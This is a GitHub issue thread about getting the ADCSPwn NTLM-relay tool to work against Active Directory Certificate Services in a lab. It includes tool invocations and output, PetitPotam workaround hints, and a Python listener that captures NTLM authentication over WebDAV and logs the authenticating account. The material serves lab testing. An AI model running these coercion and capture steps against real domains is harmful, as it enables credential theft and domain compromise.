
Help for lab setup? #3

Open · 7MinSec opened this issue Aug 2, 2021 · 8 comments
Labels: bug (Something isn't working)


7MinSec commented Aug 2, 2021

Hello there,

I'm SUPER excited to try this in the lab. I spun up a fresh Server 2019, joined to my test domain, and then followed this blog to install ADCS. All services appear to be good to go, and if I browse to http://adcs.my.domain/certsrv I get the ADCS page.

However, if I try to trigger ADCSPwn, I only get...

[i] Found 34 certificate templates
[i] Set ADCS web service as: adcs.my.domain
[i] Triggering authentication from target [dc.my.domain]

...and then that's it.

Are there some basic troubleshooting things I can do? Not sure where the disconnect is here.

Thanks,
Brian

bats3c (Owner) commented Aug 2, 2021

That is because ADCSPwn relies on WebDAV as described in issue #2

@bats3c bats3c closed this as completed Aug 2, 2021
salinnsilva commented

ADCSPwn.exe --adcs barcelona12.dc.nova --remote 192.168.172.129 --output C:\Temp\cert_b64.txt

The local computer is not part of a domain or the domain cannot be contacted.

Even with everything right and connected.

bats3c (Owner) commented Aug 3, 2021

@salinnsilva please stick to issue #4 with your problem.


j0nh4t commented Aug 13, 2021

I'm having the same issue even though the WebClient service is running. Any tips for troubleshooting?

Running as a domain user.

PS C:\Tools> sc.exe query WebClient

SERVICE_NAME: WebClient
        TYPE               : 30  WIN32
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

PS C:\Tools> .\ADCSPwn.exe --adcs adcs.evilcorp.local

   _____  ________  _________   ___________________
  /  _  \ \______ \ \_   ___ \ /   _____/\______   \__  _  ______
 /  /_\  \ |    |  \/    \  \/ \_____  \  |     ___/\ \/ \/ /    \
/    |    \|    `   \     \____/        \ |    |     \     /   |  \
\____|__  /_______  /\______  /_______  / |____|      \/\_/|___|  /
        \/        \/        \/        \/                        \/

Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik -  TrustedSec

[i] Found 34 certificate templates
[i] Set ADCS web service as: adcs.evilcorp.local
[i] Triggering authentication from target (localhost)

[i] Using path \\workstation1@8080/7AWGI387CI\22Y53PGE8F\OCFDDCWS8W

It doesn't time out, it just hangs here. workstation1 is listening on 8080.

On ADCS there are no new issued, pending or failed requests. I have no issues when exploiting with PetitPotam and ntlmrelayx so I think my ADCS is running and configured correctly.
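For the "hangs after Triggering authentication" symptom above, the first thing worth knowing is whether the target's WebClient service ever reaches the listener at all, and if it does, who it authenticated as. The following is an added diagnostic, not ADCSPwn's code and not something the project ships: a minimal stand-in for the HTTP endpoint the tool expects on the attacker host. The hostname workstation1, port 8080, and the sample domain/user/workstation names in the constructed test messages are assumptions. It shows which URL the WebDAV Mini-Redirector derives from the `\\host@port\path` UNC form ADCSPwn prints, answers the NTLM handshake just far enough to get an AUTHENTICATE (type 3) message, and logs the account that authenticated. A target that never sends even an OPTIONS/PROPFIND points at the WebClient service or the EFS trigger; a target that authenticates but yields no request on the CA points at the relay step instead.

```python
# Added diagnostic listener, NOT ADCSPwn's own code. It stands in for the HTTP
# endpoint the tool expects on the attacker host (workstation1:8080 above; name and
# port assumed) and logs WHO authenticated over WebDAV.
import base64
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer

NTLMSSP = b"NTLMSSP\x00"
NEGOTIATE_UNICODE, NEGOTIATE_NTLM = 0x00000001, 0x00000200
NEGOTIATE_EXTENDED_SESSIONSECURITY, NEGOTIATE_TARGET_INFO = 0x00080000, 0x00800000

def webdav_unc_to_url(unc: str) -> str:
    """\\\\host@port\\a\\b (or \\\\host@SSL@port\\a\\b) -> URL the Mini-Redirector requests.
    Forward slashes are accepted because ADCSPwn prints the path with mixed separators."""
    parts = unc.replace("/", "\\").strip("\\").split("\\")
    labels = parts[0].split("@")
    host, path = labels[0], "/".join(parts[1:])
    scheme = "https" if any(l.upper() == "SSL" for l in labels[1:]) else "http"
    port = next((int(l) for l in labels[1:] if l.isdigit()), 443 if scheme == "https" else 80)
    return f"{scheme}://{host}:{port}/{path}"

def _sec_buf(msg: bytes, field_offset: int) -> bytes:
    # Resolve an NTLM Len/MaxLen/Offset field to the bytes it points at.
    length, _max_len, offset = struct.unpack_from("<HHI", msg, field_offset)
    return msg[offset:offset + length]

def parse_ntlm(authorization: str) -> dict:
    """Decode an 'Authorization: NTLM <base64>' header value (type 1 or type 3)."""
    scheme, _, token = authorization.strip().partition(" ")
    if scheme.upper() not in ("NTLM", "NEGOTIATE"):
        raise ValueError(f"not an NTLM token: {scheme!r}")
    msg = base64.b64decode(token)
    if not msg.startswith(NTLMSSP):
        raise ValueError("missing NTLMSSP signature")
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    if msg_type == 1:
        return {"type": 1, "name": "NEGOTIATE"}
    if msg_type != 3:
        raise ValueError(f"unexpected NTLM message type {msg_type}")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    return {"type": 3, "name": "AUTHENTICATE",
            "domain": _sec_buf(msg, 28).decode(enc),
            "user": _sec_buf(msg, 36).decode(enc),
            "workstation": _sec_buf(msg, 44).decode(enc),
            "ntlmv2": len(_sec_buf(msg, 20)) > 24}  # an NTLMv1 NT response is exactly 24 bytes

def build_challenge(server_challenge: bytes) -> str:
    """Minimal CHALLENGE (type 2): empty TargetName, TargetInfo holding only MsvAvEOL."""
    target_info = struct.pack("<HH", 0, 0)  # AvId=MsvAvEOL, AvLen=0
    flags = NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_EXTENDED_SESSIONSECURITY | NEGOTIATE_TARGET_INFO
    fixed_len = 56  # Signature..Version; the TargetInfo payload starts right after
    msg = (NTLMSSP + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, fixed_len)  # TargetNameFields
           + struct.pack("<I", flags) + server_challenge + bytes(8)                 # flags, challenge, reserved
           + struct.pack("<HHI", len(target_info), len(target_info), fixed_len)   # TargetInfoFields
           + bytes(8) + target_info)                                                # Version, payload
    return "NTLM " + base64.b64encode(msg).decode()

def build_negotiate() -> str:
    """Constructed NEGOTIATE (type 1), used only to exercise the listener offline."""
    msg = NTLMSSP + struct.pack("<II", 1, NEGOTIATE_UNICODE | NEGOTIATE_NTLM) + bytes(16)
    return "NTLM " + base64.b64encode(msg).decode()

def build_authenticate(domain: str, user: str, workstation: str, nt_response: bytes) -> str:
    """Constructed AUTHENTICATE (type 3), used only to exercise parse_ntlm offline."""
    fields = [b"", nt_response, domain.encode("utf-16-le"),
              user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    fixed_len, buf_fields, payload = 88, b"", b""  # fixed part includes Version and MIC
    for f in fields:
        buf_fields += struct.pack("<HHI", len(f), len(f), fixed_len + len(payload))
        payload += f
    msg = (NTLMSSP + struct.pack("<I", 3) + buf_fields
           + struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM) + bytes(8) + bytes(16) + payload)
    return "NTLM " + base64.b64encode(msg).decode()

def next_response(authorization, server_challenge: bytes = b"\x11" * 8):
    """(status, WWW-Authenticate value or None, parsed message) for one request."""
    if not authorization:
        return 401, "NTLM", None
    info = parse_ntlm(authorization)
    if info["type"] == 1:
        return 401, build_challenge(server_challenge), info
    return 200, None, info  # type 3 arrived; a relay would forward it to /certsrv here

class Handler(BaseHTTPRequestHandler):
    def _serve(self):
        status, www_auth, info = next_response(self.headers.get("Authorization"))
        if info and info["type"] == 3:
            print(f"[+] {info['domain']}\\{info['user']} from {info['workstation']} "
                  f"(NTLMv2={info['ntlmv2']}) authenticated to {self.path}")
        self.send_response(status)
        if www_auth:
            self.send_header("WWW-Authenticate", www_auth)
        self.send_header("Content-Length", "0")
        self.end_headers()
    do_GET = do_OPTIONS = do_PROPFIND = _serve  # WebClient opens with OPTIONS/PROPFIND

if __name__ == "__main__":
    print("[*] expecting", webdav_unc_to_url(r"\\workstation1@8080/7AWGI387CI\22Y53PGE8F\OCFDDCWS8W"))
    HTTPServer(("0.0.0.0", 8080), Handler).serve_forever()
```

Run it on the host ADCSPwn names in `--remote` (here workstation1, on the port from the printed path) before triggering, then watch for the OPTIONS/PROPFIND and the `[+]` line. The type 2 challenge is deliberately minimal (fixed challenge, empty target name, EOL-only target info), which is fine for a diagnostic but is not a relay: nothing here forwards the token to `/certsrv`, so a `[+]` line followed by no request on the CA means the problem is in the relay step, not the trigger. No `[+]` and no request at all means the target never reached WebDAV, which is what the WebClient check with `sc.exe query WebClient` above is for.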

bats3c (Owner) commented Aug 19, 2021

Yes, I am having the same issue since Patch Tuesday. It appears that MS have patched something which is preventing PetitPotam from triggering the authentication over WebDAV; I am currently working on a fix.

@bats3c bats3c added the bug Something isn't working label Aug 19, 2021
@bats3c bats3c reopened this Aug 19, 2021

qaxnb666 commented Nov 1, 2021

I would like to know how did you solve this problem.


0xAsh commented Mar 7, 2022

> Yes, I am having the same issue since Patch Tuesday. It appears that MS have patched something which is preventing PetitPotam from triggering the authentication over WebDAV; I am currently working on a fix.

I believe MS hotfixed the original RPC calls that were disclosed by Topotam. I've had decent success utilizing Ly4k's Python implementation which introduces extra EfsRpc calls, might be helpful.


V0lk3n commented Jul 29, 2022

Look at this thread on Twitter; there is a workaround apparently: https://twitter.com/snovvcrash/status/1552937059614363648
